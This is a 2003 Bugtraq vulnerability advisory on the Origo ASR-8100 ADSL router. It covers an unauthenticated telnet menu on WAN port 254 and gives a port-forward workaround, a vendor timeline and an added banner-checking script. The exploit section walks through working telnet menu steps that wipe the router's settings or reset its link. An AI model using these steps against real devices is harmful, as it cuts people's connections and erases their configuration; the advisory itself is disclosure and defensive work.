Origo ASR-8100 ADSL router remote factory reset

From: Theo Markettos (theo_at_markettos.org.uk)
Date: 10/12/03

    Date: Sun, 12 Oct 2003 19:03:43 +0100
    To: bugtraq@securityfocus.com
    
    
    

    Vulnerable device
    -----------------

    Origo ASR-8100 ADSL router
    Firmware ETHADSL_USB_110502_REL10_S
    Customer Software Version 110502_REL10_S
    ADSL Showtime Firmware Version: 3.21
    device based on Conexant CX82310-14 chipset

    Vulnerability: Remote ADSL reset and permanent denial of service attack
    -----------------------------------------------------------------------

    The device above can be remotely reset to factory settings, allowing a
    permanent denial of service attack until it is reconfigured manually by an
    operator. The factory reset only takes effect the next time the device is
    reset, which may be some time after the attack has been performed. PPP
    authentication information is lost on reset to factory settings, so it is
    most likely that the device will be unable to establish a WAN link after
    reset.

    The ADSL link can also be remotely reset, causing temporary DoS and (if DHCP
    is used) its IP address to be changed.

    Attack overview
    ---------------

    A telnet-style configuration interface is left open on the WAN interface on
    port 254, with no password set. This menu system is very easily driven by
    a remote attacker.

    A full exploit is given below.

    Workaround
    ----------

    Forwarding external port 254 to an internal port that is unused prevents
    access to the configuration interface.

    With the web configuration interface at http://router-ip/doc/advance.htm
    click on Configuration: Virtual server
    Enter a new entry:
    Public port: 254
    Private port: 9876
    TCP
    Host IP address: 127.0.0.1
    Click 'Add this setting', then do Configuration: Save Settings/Reboot and
    click 'Save & Reboot'

    Exploit details
    ---------------

    From any Internet connected host:

    telnet <router global IP address> 254
    Returns a menu:
    01/01/99 CONEXANT SYSTEMS, INC.
    00:04:10
                    ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.21
                       
    You are prompted for a LOGIN PASSWORD>
    Just press return
    Brings up MAIN MENU
      1. SYSTEM STATUS AND CONFIGURATION
      2. ADSL MENU
      
      4. REMOTE LOGON
      
    Press 1 - get to SYSTEM STATUS AND CONFIGURATION
      1. SYSTEM INFORMATION
      2. SYSTEM CONFIGURATION
    Press 2 - get to SYSTEM CONFIGURATION
      1. CHANGE SYSTEM TIME
      2. CHANGE SYSTEM DATE
      3. CHANGE PASSWORD
      4. FACTORY DEFAULT CONFIGURATION

    Type 1 hh:mm:ss to reset the system time
    Type 2 dd/mm/yy to reset the system date
    (Option 3 doesn't seem to work)

    Type 4: Prompt: This will reset all the configurations and the ADSL modem.
    Are you sure?(Y/N)

    Type Y: Message: NVRAM updated

    This does not reset the ADSL modem, only clears the NVRAM. This takes
    effect the next time the modem is reset: the admin password is reset to
    that printed in the documentation, and the ADSL username/password are
    reset, meaning the connection is down permanently until a human sets them
    up again. Any other settings (security etc) are also lost.

    From main menu, type 2 to get to ADSL MENU
      1. ADSL PERFORMANCE STATUS
      2. 24 HOUR ADSL PERFORMANCE HISTORY
      3. 7 DAY ADSL PERFORMANCE HISTORY
      4. ADSL ALARM HISTORY
      5. ADSL TRANSCEIVER CONFIGURATION MENU
      6. ADSL LINK RESET

    Type 6: Prompt: This will bring down the ADSL link. Are you sure(Y/N)?
    Type Y. The ADSL link is reset and a new WAN IP address is requested by
    DHCP (if the ISP uses it).

    Vendor notification
    -------------------

    UK support for the vendor (support@adsltech.com) was notified on 30th
    August 2003 - the entirety of the reply message was 'Thanks a lot'. The
    vendor doesn't advertise an email address, so they were notified via web
    form on that date - no response received. To date the vendor has not
    advertised any patches or new firmware.

    -- 
    Theo Markettos                 theo@markettos.org.uk
    Clare Hall, Cambridge          theom@chiark.greenend.org.uk
    CB3 9AL, UK                    http://www.markettos.org.uk/
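
To confirm from the Internet side that the port-forward workaround described in the advisory has closed port 254, the following check can be used. It is an added example, not part of the original advisory: it only connects and reads what the service sends, and the marker strings are taken from the banner quoted above; the function names and result labels are made up for this example.

```python
import socket

# Strings that appear in the console banner and prompt quoted in the advisory.
CONSOLE_MARKERS = (b"CONEXANT SYSTEMS", b"ACCESS RUNNER", b"LOGIN PASSWORD")


def classify_banner(data: bytes) -> str:
    """'exposed' if the bytes look like the port-254 console, else 'open-unknown'."""
    upper = data.upper()
    return "exposed" if any(m in upper for m in CONSOLE_MARKERS) else "open-unknown"


def read_banner(sock: socket.socket, timeout: float = 5.0, limit: int = 4096) -> bytes:
    """Read what the service volunteers on connect; nothing is ever sent."""
    sock.settimeout(timeout)
    data = b""
    try:
        while len(data) < limit and classify_banner(data) != "exposed":
            chunk = sock.recv(1024)
            if not chunk:          # peer closed the connection
                break
            data += chunk
    except OSError:                # read timeout or reset: keep what we have
        pass
    return data


def check_console_port(host: str, port: int = 254, timeout: float = 5.0) -> str:
    """Return 'closed', 'exposed' or 'open-unknown' for host:port."""
    try:
        sock = socket.create_connection((host, port), timeout=timeout)
    except OSError:                # refused, filtered or unreachable
        return "closed"
    with sock:
        return classify_banner(read_banner(sock, timeout))


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 2:
        sys.exit("usage: python check254.py <router WAN address>")
    print(check_console_port(sys.argv[1]))
```

Run it from a host outside the LAN: `closed` is the expected result once the workaround is in place, while `exposed` means the console banner is still being served on the WAN side.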
    
    


